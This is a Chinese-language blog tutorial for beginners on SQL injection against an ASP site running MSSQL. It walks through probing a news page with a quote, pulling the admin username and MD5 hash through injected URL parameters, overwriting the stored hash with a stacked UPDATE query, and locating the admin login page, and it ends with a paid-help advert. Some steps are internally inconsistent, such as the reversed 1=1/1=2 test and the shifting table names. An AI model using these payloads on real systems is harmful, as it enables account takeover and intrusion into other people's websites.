SQL注射修改難猜解的MD5
[重要通告]如您遇疑難雜癥,本站支持知識付費業(yè)務,掃右邊二維碼加博主微信,可節(jié)省您寶貴時間哦!
在線破解MD5的網站上查。但有的MD5密碼很偏,所以一些新手會放棄。我為新手介紹一種很簡單就能修改難猜解MD5密碼的方法。
常入侵的高手就忽略過..
隨便找個地址
http://www.xxx.org/news.asp?id=121
在地址后輸入單引號,顯示
Microsoft OLE DB Provider for SQL Server 錯誤 ’80040e14’
字符串 ’’’ 之前有未閉合的引號
/news/wantpws.asp,行63
說明沒有過濾單引號且數據庫是MSSQL.
and 1=1出錯。and 1=2正常。
接著輸入
http://www.xxx.org/news.asp?id=1 or admin_user in (select id from admin)
得到帳號為:admin
http://www.xxx.org/news.asp?id=121 or admin_password in (select id from admin)
得到密碼為:a4716077c2ba075c
接下來我們就可以改密碼了。但我們先前要知道我們加密的字符:e8dc763194f29433
鍵入 :
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’--
這句的意思就是用e8dc763194f29433替換a4716077c2ba075c,以達到修改密碼的目的。
掃一下后臺為
http://www.xxx.org/admin/admin_login.asp
問題未解決?付費解決問題加Q或微信 2589053300 (即Q號又微信號)右上方掃一掃可加博主微信
所寫所說,是心之所感,思之所悟,行之所得;文當無敷衍,落筆求簡潔。 以所舍,求所獲;有所依,方所成!